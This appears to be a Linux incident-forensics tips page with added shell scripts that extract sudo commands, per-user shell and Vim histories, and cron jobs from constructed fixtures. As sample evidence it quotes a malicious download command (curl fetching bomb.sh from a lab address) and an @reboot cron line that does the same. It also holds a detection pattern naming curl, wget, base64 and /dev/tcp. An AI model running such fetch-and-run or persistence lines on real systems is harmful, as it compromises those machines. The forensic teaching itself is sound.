Linux Incident Forensics - Tips
Edit the sudoers file.
visudo is the safe way to edit the sudoers configuration, the file that holds all the sudo rules. It locks the file against concurrent edits and runs basic sanity checks, refusing to save a file with parse errors (a broken sudoers file can lock everyone out of sudo). If the file is already being edited you will receive a message to try again later. The command itself lives at /usr/sbin/visudo; the file it edits is /etc/sudoers, together with any drop-in files under /etc/sudoers.d/. During an incident, read those files rather than edit them, and look for rules or users that were added around the time of the compromise.
visudo location
/usr/sbin/visudo
We can perform an in-depth search of the system by examining the authentication log: /var/log/auth.log on Debian and Ubuntu (/var/log/secure on Red Hat-based systems; on machines that only keep the systemd journal, query it with journalctl instead). It records logins, SSH sessions, su and sudo use, and every command executed through sudo, each written as a line with a COMMAND= field. It does not record commands typed in a plain shell; for those, check the history files described further down. It is a good place to start when doing a forensic analysis of a machine.
Checking .log files
cat /var/log/auth.log*
Use grep to select specific lines from the file:
cat /var/log/auth.log* | grep -i COMMAND
Here grep is asked for every line containing the word "COMMAND", which in auth.log marks a command run through sudo; the -i flag makes the match case-insensitive. Rotated logs are usually compressed (auth.log.2.gz and so on) and cat prints them as compressed bytes, so use zgrep in place of cat | grep when the whole log history matters.
It is also a good idea to search for script files that were executed, such as .sh, .py or .php files.
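The extraction described above, as an added example that is not part of the original page: it pulls every sudo COMMAND= record out of an auth.log-style file and splits it into timestamp, invoking user, target user, working directory and command, then narrows to script files. The log lines are constructed for the demo (the host name, users and the 10.10.158.38 address are made up); on a live system point sudo_commands at /var/log/auth.log, or pipe zcat of the rotated .gz files into it.

```shell
#!/bin/sh
# Added example (not from the original page): extract the commands sudo
# logged from an auth.log-style file. SAMPLE_AUTH_LOG is a constructed
# stand-in for /var/log/auth.log; on a live system call
#   sudo_commands /var/log/auth.log   (or zcat the .gz rotations into it)

# Constructed sample log. Only the three "sudo:" lines carrying COMMAND=
# are records of a command; the sshd and pam session lines are noise.
SAMPLE_AUTH_LOG='Apr 12 10:01:03 host sshd[1234]: Accepted password for cybert from 10.10.158.38 port 51002 ssh2
Apr 12 10:01:03 host sshd[1234]: pam_unix(sshd:session): session opened for user cybert by (uid=0)
Apr 12 10:02:17 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/curl 10.10.158.38:8080/bomb.sh --output bomb.sh
Apr 12 10:02:45 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/bash bomb.sh
Apr 12 10:03:00 host sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=1000)
Apr 12 10:05:12 host sudo:   alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update'

# sudo_commands [FILE...]: one TAB-separated record per sudo COMMAND= line:
#   timestamp, invoking user, target user (USER=), working dir (PWD=), command
# Reads stdin when no file is given. Fields are split on " ; " so a command
# that itself contains "USER=" or "PWD=" is not mis-parsed; anything after
# COMMAND= is glued back together.
sudo_commands() {
    grep -h 'sudo:.*COMMAND=' "$@" | awk '{
        ts = $1 " " $2 " " $3        # syslog timestamp (no year)
        invoker = $6                 # "Apr 12 10:02:17 host sudo:   cybert : ..."
        n = split($0, part, / ; /)
        pwd = ""; target = ""; cmd = ""
        for (i = 2; i <= n; i++) {
            if (part[i] ~ /^PWD=/) pwd = substr(part[i], 5)
            else if (part[i] ~ /^USER=/) target = substr(part[i], 6)
            else if (part[i] ~ /^COMMAND=/) {
                cmd = substr(part[i], 9)
                for (j = i + 1; j <= n; j++) cmd = cmd " ; " part[j]
                break
            }
        }
        printf "%s\t%s\t%s\t%s\t%s\n", ts, invoker, target, pwd, cmd
    }'
}

# sudo_scripts [FILE...]: the subset of sudo_commands whose command names a
# script file (.sh, .py, .php), the "script files that were executed" check.
sudo_scripts() {
    sudo_commands "$@" | awk -F '\t' '$5 ~ /\.(sh|py|php)$/ || $5 ~ /\.(sh|py|php) /'
}

# Demo run against the constructed sample.
printf '%s\n' "$SAMPLE_AUTH_LOG" | sudo_scripts
```

The working directory (PWD=) is worth keeping in the output: it tells you where a relative name such as bomb.sh was actually written, which is where to look for the file on disk.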
Check the Command History
Every user with a shell has a .bash_history file in their home directory (root's is /root/.bash_history); use it to investigate the commands that user ran. Two caveats: bash only writes the file when the shell exits cleanly, and an attacker can disable or clear it, so an empty or missing history is itself worth noting rather than proof that nothing happened. Also, an intruder may have compromised more than one account, so read the histories side by side: a payload downloaded under account X may have been executed under account Y.
Download a File from a web server using curl
In this example, this is the command our analysis found to be malicious:
curl 10.10.158.38:8080/bomb.sh --output bomb.sh
The command above fetches the file bomb.sh from a web server hosted at the IP address 10.10.158.38, connecting on port 8080, and saves it to the current directory under the same name because of --output bomb.sh. A curl or wget in a history or sudo log pointed at an unusual host and port is a strong lead: note the source address, the file name and the working directory, and look for the file (or a renamed copy of it) on disk.
Vim History
Vim, the text editor used from inside the Linux terminal, also keeps history that is useful in incident forensics. Check the following file, usually located in the user's home directory: it records the command-line history (including :w commands, which show where a file was saved), search patterns, and a file marks section listing the paths of recently edited files.
.viminfo
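An added example, not from the original page, that serves both the command-history section and the Vim section above: it walks every interactive account in a passwd file and dumps that user's .bash_history lines together with the command-line history and file-mark paths from .viminfo, tagged with the account name, so a payload fetched under one account and run under another shows up side by side. The fixture (accounts, home directories, history lines and the .viminfo excerpt) is constructed for the demo; the ROOT prefix lets the same function run over a mounted disk image instead of the live system.

```shell
#!/bin/sh
# Added example (not from the original page): collect the per-user shell and
# Vim artefacts for every interactive account so that a payload fetched under
# one account and executed under another is visible side by side.
# PASSWD is a passwd(5) file and ROOT a path prefix (empty for the live
# system, or a mounted image); the fixture below is constructed for the demo.

# user_shell_artifacts PASSWD ROOT: print "user<TAB>source<TAB>line" for each
# .bash_history line, each Vim command-line history entry (:w, :!..., etc.)
# and each path in the .viminfo file-marks section.
user_shell_artifacts() {
    passwd=$1; root=${2:-}
    # passwd fields: name:pw:uid:gid:gecos:home:shell; skip service accounts
    while IFS=: read -r name pw uid gid gecos home shell; do
        case $shell in */nologin|*/false|"") continue ;; esac
        hist="$root$home/.bash_history"
        if [ -r "$hist" ]; then
            awk -v u="$name" '{ printf "%s\tbash_history\t%s\n", u, $0 }' "$hist"
        fi
        vi="$root$home/.viminfo"
        if [ -r "$vi" ]; then
            # .viminfo is split into "# ..." headed sections; keep the ":cmd"
            # lines of the command-line history and the path (last field) of
            # each "'N line col path" file mark.
            awk -v u="$name" '
                /^# Command Line History/ { sec = "vim_cmd"; next }
                /^# File marks:/          { sec = "vim_file"; next }
                /^#/                      { sec = ""; next }
                sec == "vim_cmd"  && /^:/                       { printf "%s\t%s\t%s\n", u, sec, $0 }
                sec == "vim_file" && substr($0, 1, 1) == "\047" { printf "%s\t%s\t%s\n", u, sec, $NF }
            ' "$vi"
        fi
    done < "$passwd"
}

# Constructed fixture standing in for a mounted image: two interactive users
# plus a service account that must be skipped. Prints the fixture root.
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/home/cybert" "$fx/home/alice"
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin' \
        'cybert:x:1000:1000::/home/cybert:/bin/bash' \
        'alice:x:1001:1001::/home/alice:/bin/bash' > "$fx/passwd"
    printf '%s\n' 'ls -la' \
        'curl 10.10.158.38:8080/bomb.sh --output bomb.sh' \
        'cp bomb.sh /tmp/bomb.sh' > "$fx/home/cybert/.bash_history"
    printf '%s\n' 'chmod +x /tmp/bomb.sh' 'bash /tmp/bomb.sh' > "$fx/home/alice/.bash_history"
    printf '%s\n' '# Command Line History (newest to oldest):' \
        ':w /tmp/bomb.sh' '|2,0,1586000000,,"w /tmp/bomb.sh"' ':q' '' \
        '# File marks:' "'0  1  0  /tmp/bomb.sh" '|4,48,1,0,"/tmp/bomb.sh"' > "$fx/home/alice/.viminfo"
    echo "$fx"
}

# Demo: dump everything, then follow one file name across accounts.
fx=$(make_fixture)
user_shell_artifacts "$fx/passwd" "$fx" | grep 'bomb.sh'
rm -rf "$fx"
```

Grepping the combined output for a single file name is the point: in the fixture the download appears under cybert and the chmod, execution and Vim edit of the same file appear under alice, which a per-user look at either history alone would not reveal.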
Scheduled Tasks
Malicious files are often set up to run as a scheduled task so that they survive a reboot. The system crontab is the first place to check:
cat /etc/crontab
but it is not the only one. cron also reads the drop-in files in /etc/cron.d/, the scripts in /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly and /etc/cron.monthly, and each user's own crontab under /var/spool/cron/crontabs/ (Debian/Ubuntu) or /var/spool/cron/ (Red Hat-based); systemd timers (systemctl list-timers) are a separate mechanism that serves the same purpose and deserve a look too. Each crontab line has five schedule fields followed by the command (in /etc/crontab and /etc/cron.d the user to run as sits between them): minute, hour, day of month, month and day of week, with * meaning "every" and */N meaning "every N". To translate an entry into a human-readable time, a website such as crontab.guru will spell out when the job fires; keep in mind that the fields are minute first and hour second, not HOUR:MINUTE.
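The enumeration described above, as an added example that is not part of the original page: it lists every job from the system crontab, the /etc/cron.d drop-ins and the per-user spool files, flags the ones whose command runs from /tmp or /dev/shm, fetches something over the network or decodes a blob, and spells out the five schedule fields in plain English. The crontab contents and the /tmp/bomb.sh and /dev/shm paths in the fixture are constructed for the demo; the ROOT prefix lets it run over a mounted image.

```shell
#!/bin/sh
# Added example (not from the original page): enumerate cron jobs from every
# location cron reads, not just /etc/crontab, flag the ones that look like a
# dropper or backdoor, and spell out the five schedule fields. ROOT is a
# path prefix (empty for the live system, or a mounted image); the fixture
# below is constructed for the demo.

# cron_lines FILE KIND: emit "file<TAB>user<TAB>schedule<TAB>command" per job.
# KIND=system (/etc/crontab, /etc/cron.d) has a user column after the
# schedule; KIND=user (the spool files) takes the user from the file name.
cron_lines() {
    awk -v file="$1" -v kind="$2" -v owner="$(basename "$1")" '
        /^[[:space:]]*#/ { next }                        # comment
        NF == 0 { next }                                 # blank line
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }   # SHELL=, PATH=, MAILTO=
        {
            if ($1 ~ /^@/) { n = 1; sched = $1 }         # @reboot, @daily, ...
            else { n = 5; sched = $1 " " $2 " " $3 " " $4 " " $5 }
            if (kind == "system") { n++; user = $n } else user = owner
            cmd = ""
            for (i = n + 1; i <= NF; i++) cmd = cmd (i > n + 1 ? " " : "") $i
            printf "%s\t%s\t%s\t%s\n", file, user, sched, cmd
        }' "$1"
}

# list_cron_jobs ROOT: system crontab, /etc/cron.d drop-ins and the per-user
# spools (Debian/Ubuntu and Red Hat layouts). /etc/cron.{hourly,daily,...}
# hold scripts rather than crontab lines, so list those directories separately.
list_cron_jobs() {
    root=${1:-}
    for f in "$root/etc/crontab" "$root"/etc/cron.d/*; do
        if [ -f "$f" ]; then cron_lines "$f" system; fi
    done
    for f in "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/*; do
        if [ -f "$f" ]; then cron_lines "$f" user; fi
    done
}

# flag_cron_jobs: keep jobs whose command runs from a world-writable or
# memory-backed path, fetches something from the network, or decodes a blob.
flag_cron_jobs() {
    awk -F '\t' '$4 ~ /\/tmp\/|\/dev\/shm\/|\/var\/tmp\/|curl|wget|base64|\/dev\/tcp\//'
}

# describe_schedule MIN HOUR DOM MON DOW: plain-English reading of the five
# fields ("*" = every, "*/N" = every N, anything else = that value).
describe_schedule() {
    _field() {
        case $2 in
            '*')   echo "every $1" ;;
            '*/'*) echo "every ${2#*/} ${1}s" ;;
            *)     echo "$1 $2" ;;
        esac
    }
    printf '%s, %s, %s, %s, %s\n' \
        "$(_field minute "$1")" "$(_field hour "$2")" \
        "$(_field day-of-month "$3")" "$(_field month "$4")" "$(_field weekday "$5")"
}

# Constructed fixture standing in for a mounted image. Prints the fixture root.
make_cron_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/etc/cron.d" "$fx/var/spool/cron/crontabs"
    printf '%s\n' 'SHELL=/bin/sh' 'PATH=/usr/bin:/bin' '# m h dom mon dow user command' \
        '17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly' \
        '*/5 * * * *     root    /bin/bash /tmp/bomb.sh' > "$fx/etc/crontab"
    printf '%s\n' '@reboot root /usr/bin/curl 10.10.158.38:8080/bomb.sh --output /dev/shm/.b' > "$fx/etc/cron.d/update"
    printf '%s\n' '0 3 * * 1 /home/alice/backup.sh' > "$fx/var/spool/cron/crontabs/alice"
    echo "$fx"
}

# Demo against the constructed fixture (live system: list_cron_jobs "").
fx=$(make_cron_fixture)
list_cron_jobs "$fx" | flag_cron_jobs
describe_schedule '*/5' '*' '*' '*' '*'
rm -rf "$fx"
```

The flag list is a starting point, not a verdict: a legitimate backup job can live in /var/tmp and a dropper can hide behind an innocent-looking path, so read every entry the enumeration returns, and check the modification times of the crontab files against the incident timeline.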